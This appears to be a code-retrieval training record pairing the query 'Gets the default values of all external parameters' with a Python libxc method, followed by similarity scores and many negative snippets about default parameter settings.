[ "0.7344136", "0.66554403", "0.6622951", "0.6612917", "0.6590222", "0.65895045", "0.65495247", "0.6545839", "0.64892864", "0.6436556", "0.6409071", "0.6368646", "0.6351103", "0.6338677", "0.6323158", "0.63069546", "0.628588", "0.628588", "0.6284201", "0.6275635", "0.62606674", "0.62537086", "0.6227173", "0.6226887", "0.62034166", "0.6192739", "0.6192115", "0.61768305", "0.61747104", "0.6159948", "0.61568415", "0.6150448", "0.61442703", "0.61311847", "0.61311847", "0.61235636", "0.6119077", "0.61083984", "0.60845923", "0.60761184", "0.6045526", "0.6031636", "0.6015436", "0.60061324", "0.6004565", "0.5992909", "0.5974509", "0.594109", "0.5923595", "0.5922974", "0.5921195", "0.59178334", "0.5913342", "0.5905441", "0.59053254", "0.5882289", "0.5881651", "0.58783495", "0.5860041", "0.5859595", "0.5858152", "0.5854411", "0.58431596", "0.584066", "0.583517", "0.583517", "0.583517", "0.58348227", "0.58348227", "0.5830074", "0.582852", "0.582852", "0.582852", "0.582852", "0.582852", "0.5828332", "0.5823732", "0.5822458", "0.581928", "0.58124393", "0.58124393", "0.58124393", "0.58124393", "0.58124393", "0.58124393", "0.58124393", "0.58124393", "0.58005863", "0.5799619", "0.5798829", "0.57776505", "0.576831", "0.5766746", "0.57631886", "0.576316", "0.5761059", "0.5759194", "0.5757899", "0.5754541", "0.57540774" ]
0.7465921
0
Gets the default values of all external parameters.
def get_ext_param_default_values(self):
        num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info)

        ret = []
        for p in range(num_param):
            tmp = core.xc_func_info_get_ext_params_default_value(self.xc_func_info, p)
            ret.append(tmp)

        return ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parameters_default(cls):\n return cls._Parameters.__new__.__defaults__", "def default_parameters(self) -> List[Parameter]:\n return self.settings.job_default_parameters", "def initDefaults(self):\n return _libsbml.Parameter_initDefaults(self)", "def parameters(self):\n return self._default_params", "def get_parameters(self):\n params = {}\n for p in self.DEFAULT_VALUES.keys():\n params[p] = getattr(self, p)\n return params", "def get_default_parameters(self, default_type):\n return self._default_parameters.get(default_type, {})", "def getDefaultParameterValues(self):\r\n dct = {}\r\n self.initializeRoadRunnerModel()\r\n self.roadrunnerModel.reset()\r\n for parameterName in self.parametersToFit:\r\n dct[parameterName] = self.roadrunnerModel.model[parameterName]\r\n return dct", "def get_defaults(self):\n\t\treturn self.__defaults", "def _resolve_defaults(self, **kwargs):\n res = list()\n for name, value in kwargs.items():\n if value is None:\n value = self.default(name)\n if value is None:\n raise RuntimeError(f\"Missing default {name}\")\n res.append(value)\n return res", "def _get_default_import_values(self, cr, uid, external_session, mapping_id=None, defaults=None, context=None):\n return defaults", "def _default_parameters():\n\n return {\n 'opt': 'adadelta',\n 'activation_function': 'softmax',\n 'lr': 0.0001,\n 'decay': 1e-6,\n 'loss': 'categorical_crossentropy',\n 'batch_size': 32,\n 'nb_epoch': 20,\n 'shuffle': True,\n 'momentum': 0.9,\n 'nesterov': True,\n 'rho': 0.95,\n 'epsilon': 1e-08,\n 'beta_1': 0.9,\n 'beta_2': 0.999,\n 'horizontal_flip': False,\n 'im_size': 240,#256,\n 'dense_layer': 1024,\n 'nb_classes': 10,\n 'nb_channels': 3,\n 'dropout': 0.5,\n 'metrics': ['accuracy'],\n 'volume': None,\n 'input_size': 25,\n 'temporal': False,\n 'input_dim': 512,\n 'nb_frames': 60,\n 'stride': 16,\n 'nb_hidden':512,\n 'lstm': False\n\n }", "def get_defaultvalues(host):\n return get_obj_defaultvalues(OBJT_HOST, host)", "def _get_default_parameters(new_values):\n no_default = [\"BEAM\", \"TYPE\", \"ERRORDEF\", \"CORRECTIONS\"]\n\n not_found = [nf for nf in no_default if nf not in new_values]\n if any(not_found):\n raise ValueError(\"Required parameters '{}' not found.\".format(not_found))\n\n # Some defaults\n default = {\n # Beam Parameters\n \"QX\": \"62.31\",\n \"QY\": \"60.32\",\n \"CHROMX\": \"3\",\n \"CHROMY\": \"3\",\n # Settings\n \"USETHIN\": \"1\",\n \"ARCERRORS\": \"0\",\n \"CALCCORRECTIONS\": \"1\",\n # Outputs\n \"NOMINALMACHINE\": \"\",\n \"ARCAPPLIED\": \"\",\n \"MQXAPPLIED\": \"\",\n \"MBIPAPPLIED\": \"\",\n \"ALLAPPLIED\": \"\",\n \"CORRECTED\": \"\",\n }\n\n # crossing angles and separation bumps\n for idx in [1,2,5,8]:\n for prefix in [\"XING\", \"SEP\", \"PHI\"]:\n default[\"{:s}{:d}\".format(prefix, idx)] = \"0\"\n\n # applied errors\n for idx in range(1, 12):\n for orientation in [\"A\", \"B\"]:\n default[\"{:s}{:d}\".format(orientation, idx)] = \"0\"\n\n # return dictionary filled with defaults and new values\n default.update(new_values)\n return default", "def default_parameters():\n return BackendNSParameters()", "def default_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"default_values\")", "def get_default_params():\n\n with IOTools.open_file(os.path.join(os.path.dirname(__file__),\n \"defaults.yml\")) as inf:\n result = yaml.load(inf, Loader=RoundTripLoader)\n return result", "def _get_default_export_values(self, cr, uid, external_session, mapping_id=None, defaults=None, context=None):\n return defaults", 
"def get_default_args(func):\n signature = inspect.signature(func)\n return {\n k: v.default\n for k, v in signature.parameters.items()\n if v.default is not inspect.Parameter.empty\n }", "def _apply_defaults(self):\n # Applies normal parameter defaults\n for scalar_parameter, value in self._DEFAULT_PARAMETER_SCALARS.items():\n if scalar_parameter not in self.parameters:\n self.parameters[scalar_parameter] = copy.copy(value)\n\n # Applies defaults to all ramp parameters\n for table_parameter, table in self._DEFAULT_PARAMETER_TABLES.items():\n self.parameters[table_parameter] = [list(tup) for tup in table]\n self.parameters['_' + table_parameter] = zip(*self.parameters[table_parameter])", "def get_default_params() -> Dict:\n default_params = {\n \"n_estimators\": {\n \"default_value\": 100,\n \"description\": \"Number of gradient boosted trees. \"\n \"Equivalent to number of boosting rounds.\",\n \"type\": \"int\"\n },\n \"max_depth\": {\n \"default_value\": 6,\n \"description\": \"Maximum tree depth for base learners.\",\n \"type\": \"int\"\n },\n \"learning_rate\": {\n \"default_value\": 0.3,\n \"description\": \"Boosting learning rate (xgb's 'eta')\",\n \"type\": \"float\"\n },\n \"verbosity\": {\n \"default_value\": 1,\n \"description\": \"The degree of verbosity. Valid values are 0 (silent) - 3 (debug).\",\n \"type\": [0, 1, 2, 3]\n },\n \"booster\": {\n \"default_value\": \"gbtree\",\n \"description\": \"Specify which booster to use: gbtree, gblinear or dart.\",\n \"type\": ['gbtree', 'gblinear', 'dart']\n },\n \"tree_method\": {\n \"default_value\": \"auto\",\n \"description\":\n '''\n Specify which tree method to use. Default to auto. If this parameter\n is set to default, XGBoost will choose the most conservative option\n available. It's recommended to study this option from parameters\n document.\n ''',\n \"type\": [\"auto\", \"exact\", \"approx\", \"hist\", \"gpu_hist\"]\n },\n \"n_jobs\": {\n \"default_value\": 1,\n \"description\": '''\n Number of parallel threads used to run xgboost. When used with other Scikit-Learn\n algorithms like grid search, you may choose which algorithm to parallelize and\n balance the threads. 
Creating thread contention will significantly slow dowm both\n algorithms.\n ''',\n \"type\": \"int\"\n },\n \"gamma\": {\n \"default_value\": 0.0,\n \"description\": \"Minimum loss reduction required to make a further \"\n \"partition on a leaf node of the tree.\",\n \"type\": \"float\"\n },\n \"min_child_weight\": {\n \"default_value\": 1.0,\n \"description\": \"Minimum loss reduction required to make a further \"\n \"partition on a leaf node of the tree.\",\n \"type\": \"float\"\n },\n \"max_delta_step\": {\n \"default_value\": 0.0,\n \"description\": \"Maximum delta step we allow each tree's weight estimation to be.\",\n \"type\": \"float\"\n },\n \"subsample\": {\n \"default_value\": 1.0,\n \"description\": \"Subsample ratio of the training instance.\",\n \"type\": \"float\"\n },\n \"colsample_bytree\": {\n \"default_value\": 1.0,\n \"description\": \"Subsample ratio of columns when constructing each tree.\",\n \"type\": \"float\"\n },\n \"colsample_bylevel\": {\n \"default_value\": 1.0,\n \"description\": \"Subsample ratio of columns for each level.\",\n \"type\": \"float\"\n },\n \"colsample_bynode\": {\n \"default_value\": 1.0,\n \"description\": \"Subsample ratio of columns for each split.\",\n \"type\": \"float\"\n },\n \"reg_alpha\": {\n \"default_value\": 0.0,\n \"description\": \"L1 regularization term on weights\",\n \"type\": \"float\"\n },\n \"reg_lambda\": {\n \"default_value\": 0.0,\n \"description\": \"L2 regularization term on weights\",\n \"type\": \"float\"\n },\n \"scale_pos_weight\": {\n \"default_value\": 1.0,\n \"description\": \"Balancing of positive and negative weights.\",\n \"type\": \"float\"\n },\n \"random_state\": {\n \"default_value\": 0,\n \"description\": \"Random number seed.\",\n \"type\": \"int\"\n },\n \"base_score\": {\n \"default_value\": 0.5,\n \"description\": \"The initial prediction score of all instances, global bias.\",\n \"type\": \"float\"\n },\n # \"missing\": {\n # \"default_value\": None,\n # \"description\": \"Value in the data which needs to be present as a missing value.\",\n # \"type\": \"float\"\n # },\n \"num_parallel_tree\": {\n \"default_value\": 1,\n \"description\": \"Used for boosting random forest.\",\n \"type\": \"int\"\n },\n # \"monotone_constraints\": {\n # \"default_value\": \"(0,0)\",\n # \"description\": \" Constraint of variable monotonicity. \"\n # \"See tutorial for more information.\",\n # \"type\": \"str\"\n # },\n # \"interaction_constraints\": {\n # \"default_value\": None,\n # \"description\": '''\n # Constraints for interaction representing permitted interactions. The\n # constraints must be specified in the form of a nest list, e.g. [[0, 1],\n # [2, 3, 4]], where each inner list is a group of indices of features\n # that are allowed to interact with each other. See tutorial for more\n # information\n # ''',\n # \"type\": \"str\"\n # },\n \"importance_type\": {\n \"default_value\": \"gain\",\n \"description\": '''\n The feature importance type for the feature_importances. 
property:\n either \"gain\", \"weight\", \"cover\", \"total_gain\" or \"total_cover\".\n ''',\n \"type\": [\"gain\", \"weight\", \"cover\", \"total_gain\", \"total_cover\"]\n }\n }\n\n return default_params", "def default_parameters(name):\n prm = Parameters(name)\n\n prm.add('venous_compliance', float())\n prm.add('arterial_compliance', float())\n\n prm.add('venous_resistance', float())\n prm.add('arterial_resistance', float())\n prm.add('peripheral_resistance', float())\n\n prm.add('venous_resting_volume', float())\n prm.add('arterial_resting_volume', float())\n\n return prm", "def default_parameters():\n prm = Parameters('windkessel_model')\n\n prm.add('total_volume', float())\n\n prm.add('venous_compliance', float())\n prm.add('arterial_compliance', float())\n\n prm.add('venous_resistance', float())\n prm.add('arterial_resistance', float())\n prm.add('peripheral_resistance', float())\n\n prm.add('venous_resting_volume', float())\n prm.add('arterial_resting_volume', float())\n\n return prm", "def get_optional_parameters(self) -> list:\n results = []\n if self.no_params or self.params_required:\n return []\n else:\n for parameter, parameter_details in self.parameters.items():\n # Fixing issue #92\n # if parameter == \"effect\":\n # continue\n if parameter_details.default_value:\n results.append(parameter_details.name)\n return results", "def _default_params(self) -> dict[str, Any]:\n return {\n \"max_tokens\": self.max_tokens,\n \"temperature\": self.temperature,\n \"top_p\": self.top_p,\n \"logprobs\": self.logprobs,\n \"echo\": self.echo,\n \"stop_sequences\": self.stop_sequences,\n \"repeat_penalty\": self.repeat_penalty,\n \"top_k\": self.top_k,\n \"n_threads\": self.n_threads,\n \"n_ctx\": self.n_ctx,\n \"n_gpu_layers\": self.n_gpu_layers,\n \"n_gqa\": self.n_gqa if self.n_gqa else None,\n \"n_parts\": self.n_parts,\n \"seed\": self.seed,\n \"f16_kv\": self.f16_kv,\n \"logits_all\": self.logits_all,\n \"vocab_only\": self.vocab_only,\n \"use_mlock\": self.use_mlock,\n \"n_batch\": self.n_batch,\n \"last_n_tokens_size\": self.last_n_tokens_size,\n \"streaming\": self.streaming,\n }", "def _initialize_defaults(self):\n for key, value in defaults.items():\n if key not in self.source_params:\n self.source_params[key] = value", "def _initialize_defaults(self):\n for key, value in defaults.items():\n if key not in self.source_params:\n self.source_params[key] = value", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return C.clone()", "def getDefaultProperties(self):\n return _libsbml.SBMLLocalParameterConverter_getDefaultProperties(self)", "def get_cfg_defaults():\r\n # Return a clone so that the defaults will not be altered\r\n # This is for the \"local variable\" use pattern\r\n return _C.clone()", "def default_params():\n params = {}\n params['dataset'] = 'adult'\n params['engines'] = ['MD','RDA']\n params['iters'] = 10000\n params['epsilon'] = 1.0\n params['delta'] = 0.0\n params['bounded'] = True\n params['frequency'] = 1\n params['seed'] = 0\n params['save'] = None\n params['load'] = None\n params['plot'] = None\n\n return params", "def test_defaults(self):\n fparam = FParameter(POSITIONAL_ONLY)\n assert fparam.kind == POSITIONAL_ONLY\n for k, v in FPARAM_DEFAULTS.items():\n assert getattr(fparam, k) == v", "def _external_params():\n list_ext_params = []\n list_ext_params.append(\n (hoomd.md.external.field.Periodic, \"params\",\n list([dict(A=1.5, i=1, w=3.5, p=5),\n dict(A=10, i=0, w=3.4, 
p=2)]), _evaluate_periodic))\n list_ext_params.append(\n (hoomd.md.external.field.Electric, \"E\", list([\n (1, 0, 0),\n (0, 2, 0),\n ]), _evaluate_electric))\n return list_ext_params", "def get_defaults(self):\n default_dict = {}\n args, varargs, keyword, defaults = inspect.getargspec(self.exec_obj)\n if defaults:\n default_dict = dict(zip(args[-len(defaults):], defaults))\n return default_dict", "def defaults(self):\n\n return None", "def defaults(self):\n\n return None", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return _C.clone()", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return _C.clone()", "def get_required_parameters(self) -> list:\n results = []\n if self.no_params or self.params_optional:\n return []\n else:\n for parameter, parameter_details in self.parameters.items():\n # Fixing issue #92\n # if parameter == \"effect\":\n # continue\n if not parameter_details.default_value:\n results.append(parameter_details.name)\n return results", "def default_hparams():\n return {\n \"value\": 0.,\n \"name\": \"constant_connector\"\n }", "def defaults() -> dict:\n pass", "def show_defaults(context: CreateCommandsContext):\n logger.info(\"Default parameters when creating jobs:\")\n for parameter in context.settings.job_default_parameters:\n logger.info(parameter.describe())", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return _C.clone()", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return _C.clone()", "def defaults():\n global __preset_staging\n \n t = TreeDict('Default_Parameter_Tree', __defaultpresettree__ = True)\n __preset_staging[id(t)] = t\n return t", "def get_default_configuration():\n # Pre-configured default values for various parameters:\n default_config = {\n \"name\":\"Transient\",\n \"auto\":True,\n \"ra\":0.0,\n \"dec\":0.0,\n \"radius\":10.0,\n \"resolution\":1.8,\n \"energy\":70.0,\n \"pixsize\": 16,\n \"respcode\":\"czti_Aepix.out\",\n \"txycode\":\"radec2txty.out\",\n \"resppath\":\"pixarea\",\n \"plotfile\":\"plots/localize.pdf\",\n\t \"lc_bin\":5.0,\n\t \"typ\":\"band\",\n\t \"comp_bin\":20,\t\n \"verbose\":True,\n \"do_fit\":True\n }\n required_config = {\n 'l2file':\"_level2.evt\",\n 'infile':\"file.evt\",\n 'mkffile':\"file.mkf\",\n 'trigtime':0.00,\n 'transtart':0.00,\n 'tranend':0.00,\n 'bkg1start':0.00,\n 'bkg1end':0.00,\n 'bkg2start':0.00,\n 'bkg2end':0.00,\n\t 'alpha':0.00,\n\t 'beta':0.00,\n\t 'E0':0.00,\n\t 'A':0.00\n }\n return default_config, required_config", "def default_parameters(name):\n prm = Parameters(name)\n\n prm.add('total_volume', 5000.0) # Not important for non-closed loop. 
Included for compatibility.\n\n prm.add('venous_pressure', float())\n\n prm.add('arterial_compliance', float())\n\n prm.add('venous_resistance', float())\n prm.add('arterial_resistance', float())\n prm.add('peripheral_resistance', float())\n\n return prm", "def _default_params(self) -> Dict[str, Any]:\n normal_params = {\n \"temperature\": self.temperature,\n \"max_tokens\": self.max_tokens,\n \"top_p\": self.top_p,\n \"frequency_penalty\": self.frequency_penalty,\n \"presence_penalty\": self.presence_penalty,\n \"n\": self.n,\n # \"best_of\": self.best_of,\n \"request_timeout\": self.request_timeout,\n \"logit_bias\": self.logit_bias,\n }\n return {**normal_params, **self.model_kwargs}", "def _default_parameters(cls) -> Options:\n params = super()._default_parameters()\n params.main_axes = None\n params.i_means = None\n params.q_means = None\n params.scales = None\n\n return params", "def default_parameters():\n prm = Parameters('lvad_model')\n\n prm.add('lvad_volume', 66.0)\n\n prm.add('alpha_slope', 0.0091)\n prm.add('alpha_intercept', 1.4)\n\n prm.add('beta_slope', -0.19)\n prm.add('beta_intercept', -1.9)\n\n prm.add('frequency', float())\n\n return prm", "def test_get_pipeline_default_parameters(self):\n pipeline_id = 2\n response = self.client.get_pipeline_default_parameters(pipeline_id,\n {'limit': 50, 'offset': 0})\n self.assertEqual(response['total'], 15)", "def test_defaults(self):\n params = DefaultsInterface()\n # make sure from_param_server can be called repeatedly\n params.from_param_server()\n\n self.assertEqual(params.verbosity_param_w_default, 'info')\n\n self.assertEqual(params.int_param_w_default, 1)\n self.assertAlmostEqual(params.double_param_w_default, 1.1)\n self.assertEqual(params.str_param_w_default, \"Hello World\")\n self.assertEqual(params.bool_param_w_default, True)\n self.assertEqual(params.long_param_w_default_int, 1)\n self.assertEqual(params.long_param_w_default_int_str, -1)\n self.assertEqual(params.long_param_w_default_long_string, 9223372036854775807)\n\n self.assertEqual(params.vector_int_param_w_default, [1, 2, 3])\n self.assertEqual(params.vector_double_param_w_default, [1.1, 1.2, 1.3])\n self.assertEqual(params.vector_string_param_w_default, [\"Hello\", \"World\"])\n\n self.assertEqual(params.map_param_w_default, {\"Hello\": \"World\"})\n self.assertEqual(params.enum_int_param_w_default, 1)\n self.assertEqual(params.enum_str_param_w_default, \"One\")", "def init(self, cr):\n param_obj = self.pool.get('ir.config_parameter')\n for key, func in _default_parameters.iteritems():\n ids = param_obj.search(cr, 1, [('key', '=', key)])\n if not ids:\n param_obj.set_param(cr, 1, key, func())", "def default_data(metadata=False):\n parampath = Parameters.params_path\n if not os.path.exists(parampath):\n path_in_egg = os.path.join(\"taxcalc\", Parameters.PARAM_FILENAME)\n buf = resource_stream(Requirement.parse(\"taxcalc\"), path_in_egg)\n _bytes = buf.read()\n as_string = _bytes.decode(\"utf-8\")\n params = json.loads(as_string)\n else:\n with open(Parameters.params_path) as f:\n params = json.load(f)\n\n if (metadata):\n return params\n else:\n return { k: v['value'] for k,v in params.items()}", "def defaults():\n return {}", "def initial_parameters(self):\n return self._initial_parameters", "def set_default_parameters(self):\n super().set_default_parameters()", "def getDefaultParams():\n defpar = [\n # coordinate system\n ['crd_sys', \"'sph'\", 'Coordinate system'],\n ['nx', '[60, 40, 30]', 'Number of grid points in the first dimension'],\n ['xbound', '[0.1*au, 
30.*au, 110.*au, 250.*au]', 'Number of radial grid points'],\n ['ny', '[10,30, 30, 10]',\n 'Number of grid points in the second dimension'],\n ['ybound', '[0.1, pi/6., pi/2., 5.*pi/6., 3.04]',\n 'Number of radial grid points'],\n ['nz', '[361]', 'Number of grid points in the third dimension'],\n ['zbound', '[0., 2.0*pi]', 'Number of radial grid points'],\n # star related\n ['tstar', '[3900.0]', 'Temperature of star'],\n ['mstar', '[1.0*ms]', 'Mass of the star(s)'],\n ['rstar', '[2.5*rs]', 'Radius of star'],\n # gas density \n ['Rin', '[0.1*au, 80*au]', 'inner bounding edge'],\n ['Rin_w', '[0, 1*au]', 'gaussian taper before inner edge'], \n ['Rout', '[30*au, 120*au]', 'outer bounding edge'],\n ['Rout_w', '[1*au, 1*au]', 'gaussian taper after outer edge'], \n ['sigp', '[-1.0, -1.5]', 'power-law surface density'],\n ['sig0', '[1e2, 1e1]', 'surface density at Rin in g/cm^2'], \n ['ring_r', '[50*au]', 'location of gaussian ring'], \n ['ring_win', '[5*au]', 'width of gaussian ring in inner radius'],\n ['ring_wout', '[5*au]', 'width of gaussian ring in outer radius'], \n ['ring_a', '[1e2]', 'surface density at center of ring in g/cm^2]'], \n ['cutgdens', '1e-30', 'cut for density'], \n ['Rt', '100*au', 'radius for scale height'], \n ['Ht', '10*au', 'scale height'], \n ['qheight', '1.25', 'height power-law'], \n # gas species\n ['gasspec_mol_name', \"['12co']\", 'name of molecule'],\n ['gasspec_mol_abun', '[5e-5]', 'mass abundance '],\n ['gasspec_mol_dbase_type', \"['leiden']\", ''],\n ['gasspec_mol_freezeout_dfact', '[1e-3]',\n 'Factor by which the molecular abundance should be decreased in the freeze-out zone'],\n ['mol_freeze_Ht', '[24*au]', 'Height at Rt, with index=qheight, for freeze out to happen'],\n ['mol_freeze_del_hfrac', '0.2', 'Gaussian taper for freeze-out. del H = h * hfrac'],\n ['mol_snowR', '[20*au]', 'Radius when freeze out begins to happen'],\n # dust density\n # flat power-law parts\n ['dRin', '[0.1*au, 80*au]', 'inner bounding edge'],\n ['dRin_w', '[0, 1*au]', 'gaussian taper before inner edge'], \n ['dRout', '[30*au, 120*au]', 'outer bounding edge'],\n ['dRout_w', '[1*au, 1*au]', 'gaussian taper after outer edge'], \n ['dsigp', '[-1.0, -1.5]', 'power-law surface density'],\n ['dsig0', '[1e2, 1e1]', 'surface density at Rin'],\n # Lynden-Bell parts\n ['dLB_Rin', '[0.1*au]', 'inner bounding radius'], \n ['dLB_Rsig', '[30*au]', 'charcteristic radius'],\n ['dLB_sigp', '[-1.0]', 'power-law exponent. 
Careful, the sign is different from the usual function by a negative sign for consistency with flat power-law'], \n ['dLB_sig0', '[1e2]', 'surface density'], \n # ring parts\n ['dring_r', '[50*au]', 'location of gaussian ring'],\n ['dring_win', '[5*au]', 'width of gaussian ring in inner radius'],\n ['dring_wout', '[5*au]', 'width of gaussian ring in outer radius'], \n ['dring_a', '[1e2]', 'surface density at center of ring in g/cm^2]'],\n ['cutddens', '1e-30', 'cut for dust density'],\n ['dRt', '[100*au]', 'radius for scale height for each grain size'], \n ['dHt', '[10*au]', 'scale height for each grain size'], \n ['dqheight', '[1.25]', 'scale height power-law for dust'], \n # temperature\n ['T0mid', '50', 'mid plane temperature at Rt'],\n ['T0atm', '50', 'atmosphere temperature at Rt'],\n ['zqratio', '3', 'factor of Ht of where temperature transition occurs'],\n ['qmid', '-0.5', 'midplane temperature exponent'],\n ['qatm', '-0.5', 'atmosphere temperature exponent'],\n ['hdel', '2', 'temperature transition exponent '],\n ['cuttemp', '10', 'temperature cut'], \n # alignment\n ['altype', \"'toroidal'\", 'alignment type']\n ]\n\n return defpar", "def _get_job_defaults():\n\n lines = []\n lines += '[Job]\\n'\n j = Job()\n for cj in j._config_names:\n v = getattr(j, cj)\n lines += '%s = %s\\n' % (cj, v)\n lines += '\\n'\n return lines", "def getInitParams(self):\n paramDict = BoostDistribution.getInitParams(self)\n paramDict['apex' ] = self.apex\n paramDict['min' ] = self.min\n paramDict['max' ] = self.max\n return paramDict", "def defaults():\r\n return fmin([], [])", "def get_defaults():\n\n return {\n 'base_types': _get_base_types(),\n 'template_types': _get_template_types(),\n 'refined_types': _get_refined_types(),\n 'humannames': _get_humannames(),\n 'argument_kinds': _get_argument_kinds(),\n 'variable_namespace': {},\n 'type_aliases': _get_type_aliases(),\n 'cpp_types': _get_cpp_types(),\n 'numpy_types': _get_numpy_types(),\n 'from_pytypes': _get_from_pytypes(),\n 'cython_ctypes': _get_cython_ctypes(),\n 'cython_cytypes': _get_cython_cytypes(),\n 'cython_pytypes': _get_cython_pytypes(),\n 'cython_cimports': _get_cython_cimports(),\n 'cython_cyimports': _get_cython_cyimports(),\n 'cython_pyimports': _get_cython_pyimports(),\n 'cython_functionnames': _get_cython_functionnames(),\n 'cython_classnames': _get_cython_classnames(),\n 'cython_c2py_conv': _get_cython_c2py_conv(),\n 'cython_py2c_conv_vector_ref': CYTHON_PY2C_CONV_VECTOR_REF,\n 'cython_py2c_conv': _get_cython_py2c_conv(),\n }", "def default_hparams():\n raise NotImplementedError('Not implemented')", "def get_defaults():\n\n return {\n \"numberofrules\": 0,\n \"datapath\": path_join_robust(BASEDIR_PATH, \"data\"),\n \"freshen\": True,\n \"replace\": False,\n \"backup\": False,\n \"skipstatichosts\": False,\n \"keepdomaincomments\": True,\n \"extensionspath\": path_join_robust(BASEDIR_PATH, \"extensions\"),\n \"extensions\": [],\n \"compress\": False,\n \"minimise\": False,\n \"outputsubfolder\": \"\",\n \"hostfilename\": \"hosts\",\n \"targetip\": \"0.0.0.0\",\n \"sourcedatafilename\": \"update.json\",\n \"sourcesdata\": [],\n \"readmefilename\": \"readme.md\",\n \"readmetemplate\": path_join_robust(BASEDIR_PATH, \"readme_template.md\"),\n \"readmedata\": {},\n \"readmedatafilename\": path_join_robust(BASEDIR_PATH, \"readmeData.json\"),\n \"exclusionpattern\": r\"([a-zA-Z\\d-]+\\.){0,}\",\n \"exclusionregexes\": [],\n \"exclusions\": [],\n \"commonexclusions\": [\"hulu.com\"],\n \"blacklistfile\": path_join_robust(BASEDIR_PATH, 
\"blacklist\"),\n \"whitelistfile\": path_join_robust(BASEDIR_PATH, \"whitelist\"),\n }", "def default_slc_dict():\n par = _par.ParameterFile.from_file(_os.path.dirname(__file__) + '/default_slc_par.par')\n return par", "def get_base_parameters(cls):\n return {\n \"cutoff\": None,\n \"method\": None\n }", "def defaults(self):\n return self.conf.get(\"defaults\", [])", "def post_init(cr, registry):\n from ecore import SUPERUSER_ID\n from ecore.addons.base.ir.ir_config_parameter import _default_parameters\n ICP = registry['ir.config_parameter']\n for k, func in _default_parameters.items():\n v = ICP.get_param(cr, SUPERUSER_ID, k)\n _, g = func()\n ICP.set_param(cr, SUPERUSER_ID, k, v, g)", "def _params(self, **kwargs):\n defaults = {'display_name': 'Test User',\n 'locale': 'en-us',\n 'country': 'us'}\n defaults.update(kwargs)\n\n return defaults", "def getInitParams(self):\n paramDict = Distribution.getInitParams(self)\n paramDict['mapping'] = self.mapping\n paramDict['values'] = self.values\n return paramDict", "def load_parameters(self):\n with open(INTERNAL_DATA_DIR / self.name_default_params, 'r') as f:\n return yaml.load(f, Loader=yaml.FullLoader)", "def get_params_for(self, prefix):\n params = super().get_params_for(prefix)\n\n if prefix == \"module\":\n # Explicitly set parameters override the default values.\n defaults = self._get_extra_module_parameters()\n defaults.update(params)\n return defaults\n else:\n return params\n return params", "def defaults(self):\n self.lib.iperf_defaults(self._test)", "def getDefaultSettings():\n return {}", "def requested_config_vals():\n return {} # no extra values needed", "def getDefault():", "def getDefaults():\n return {\n 'minsize': 10, # minimum size in MB\n 'pattern': [], # file name patterns\n }", "def get_default_prior_params(n_allele):\n\n prior_params_dict = dict()\n prior_params_paragami = paragami.PatternDict()\n\n # DP prior parameter for the individual admixtures\n prior_params_dict['dp_prior_alpha'] = np.array([6.0])\n prior_params_paragami['dp_prior_alpha'] = \\\n paragami.NumericArrayPattern(shape=(1, ), lb = 0.0)\n\n # prior on the allele frequencies\n # beta distribution parameters\n prior_params_dict['allele_prior_lambda_vec'] = np.ones(n_allele)\n prior_params_paragami['allele_prior_lambda_vec'] = \\\n paragami.NumericArrayPattern(shape=(n_allele, ), lb = 0.0)\n\n return prior_params_dict, prior_params_paragami", "def initDefaults(self):\n return _libsbml.Point_initDefaults(self)", "def getInitParams(self):\n return {}", "def get_default_model_params(self):\n\n model_params = {\n 'dropout_rate': 0.3,\n 'hidden_layer_size': 160,\n 'learning_rate': 0.01,\n 'minibatch_size': 64,\n 'max_gradient_norm': 0.01,\n 'num_heads': 1,\n 'stack_size': 1\n }\n\n return model_params", "def get_cfg_defaults():\n return _C.clone()", "def default_training_params():\n N_EPOCHS = 100\n BATCH_SIZE = 64\n EPSILON = 0.0001\n return N_EPOCHS, BATCH_SIZE, EPSILON", "def get_default_value(self):\n pass", "def get_injected_params(self):\n if 'data_params' in self.all_params.keys():\n if self.all_params['data_params'] is not None:\n data_params = {}\n for pkey in self.all_params['data_params'].keys():\n data_params[pkey] = \\\n self.all_params['data_params'][pkey]['value']\n else:\n data_params = None\n else:\n data_params = None\n return data_params", "def get_default_object_values() -> Dict[str, AllowedDefaultValueTypes]:\n # TODO(wxy): Cache this as it is accessed many times.\n\n default_object_values: Dict[str, AllowedDefaultValueTypes] = json.loads(\n 
constants.get_package_file_contents(\n 'extensions', feconf.OBJECT_DEFAULT_VALUES_EXTENSIONS_MODULE_PATH\n )\n )\n return default_object_values", "def resolve_kwdefaults(sign: inspect.Signature) -> Dict[str, Any]:\n kwdefaults = dict() # type: Dict[str, Any]\n\n # Add to the defaults all the values that are needed by the contracts.\n for param in sign.parameters.values():\n if param.default != inspect.Parameter.empty:\n kwdefaults[param.name] = param.default\n\n return kwdefaults", "def _get_params() -> dict:\n\n return EntryPointParameters(\n inputdir=dict(\n type=Path,\n required=True, \n help=\"Measurements path.\"\n ),\n outputdir=dict(\n type=Path,\n required=True,\n help=\"Output directory where to write the calibration factors.\",\n ),\n ips=dict(\n type=int,\n nargs=\"+\",\n choices=IPS,\n required=False,\n help=\"IPs to compute calibration factors for.\",\n ),\n method=dict(\n type=str,\n required=False,\n choices=METHODS,\n default=METHODS[0],\n help=(\n \"Method to be used to compute the calibration factors. \"\n \"The Beta function is used by default.\"\n ),\n ),\n )", "def _get_parameters(self):\n return None", "def get_params(self):\n return []", "def getInitParams(self):\n paramDict = BoostDistribution.getInitParams(self)\n paramDict['low'] = self.low\n paramDict['alpha'] = self.alpha\n paramDict['beta'] = self.beta\n return paramDict", "def _load_parameters(self, default):\n params = {}\n for (key, value) in default:\n params[key] = self._parse_parameter(value)\n \n if not os.path.exists(self._datadir):\n os.makedirs(self._datadir)\n \n # Check if the file already exists, and create a new one, using the \n # passed default values, if necessary\n paramfile = os.path.join(self._datadir, self.id.lower() + '.cfg')\n if 